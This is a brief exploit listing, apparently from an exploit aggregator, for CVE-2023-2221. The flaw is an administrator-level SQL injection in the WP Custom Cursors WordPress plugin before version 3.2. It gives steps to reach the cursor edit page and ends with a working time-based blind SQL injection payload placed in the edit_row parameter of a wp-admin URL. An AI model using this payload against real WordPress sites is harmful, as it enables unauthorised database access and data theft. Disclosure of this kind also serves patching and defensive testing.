Exploit for WP Custom Cursors < 3.2 - Admin+ SQLi CVE-2023-2221

Name: Exploit for WP Custom Cursors < 3.2 - Admin+ SQLi CVE-2023-2221
Rating: 5 (88 reviews)

2023-05-24 | CVSS 5.8

## https://sploitus.com/exploit?id=WPEX-ID:6666688E-7239-4D40-A348-307CF8F3B657
1. Add a new "WP Custom Cursor".

2. Return to the "WP Custom Cursors" page and click edit Cursor.

3.The WP Custom Cursors plugin was vulnerable to SQL Injection in GET /wp-admin/admin.php?page=wpcc_add_new&edit_row=(select*from(select(sleep(20)))a)